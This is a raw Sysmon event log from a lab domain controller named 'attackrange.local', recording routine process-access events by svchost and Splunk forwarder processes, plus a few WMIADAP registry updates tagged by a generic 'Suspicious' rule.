13:57:06.244{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008068Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:06.244{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008067Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:06.244{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008066Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:06.244{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008065Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:06.244{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008064Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:06.244{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008063Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:06.244{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008062Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:06.244{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008061Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:06.244{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-8632-5FCF-6101-000000009101}4568C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008060Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:06.244{10ACEC4A-85E9-5FCF-1B01-000000009101}18402620C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-8632-5FCF-6101-000000009101}4568C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008059Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:06.245{10ACEC4A-8632-5FCF-6101-000000009101}4568C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008085Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:07.478{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-8633-5FCF-6201-000000009101}4108C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008084Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:07.478{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008083Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:07.478{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008082Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:07.478{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008081Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:07.478{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008080Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:07.478{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008079Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:07.478{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008078Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:07.478{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008077Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:07.478{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008076Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:07.478{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008075Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:07.478{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-8633-5FCF-6201-000000009101}4108C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008074Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:07.478{10ACEC4A-85E9-5FCF-1B01-000000009101}18402620C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-8633-5FCF-6201-000000009101}4108C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008073Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:57:07.479{10ACEC4A-8633-5FCF-6201-000000009101}4108C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 12241200x80000000000000008104Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2020-12-08 13:57:17.805{10ACEC4A-8631-5FCF-5F01-000000009101}2324\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Updating 13241300x80000000000000008103Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-12-08 13:57:17.805{10ACEC4A-8631-5FCF-5F01-000000009101}2324\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\Object List25380 25386 25396 25406 25426 25470 25480 25518 25524 25540 13241300x80000000000000008102Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-12-08 13:57:17.805{10ACEC4A-8631-5FCF-5F01-000000009101}2324\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\First HelpDWORD (0x00006325) 13241300x80000000000000008101Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-12-08 13:57:17.805{10ACEC4A-8631-5FCF-5F01-000000009101}2324\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\First CounterDWORD (0x00006324) 13241300x80000000000000008100Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-12-08 13:57:17.805{10ACEC4A-8631-5FCF-5F01-000000009101}2324\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\Last HelpDWORD (0x000063cb) 13241300x80000000000000008099Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-12-08 13:57:17.805{10ACEC4A-8631-5FCF-5F01-000000009101}2324\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\Last CounterDWORD (0x000063ca) 13241300x80000000000000008098Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-12-08 13:57:17.805{10ACEC4A-8631-5FCF-5F01-000000009101}2324\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Last HelpDWORD (0x000063cb) 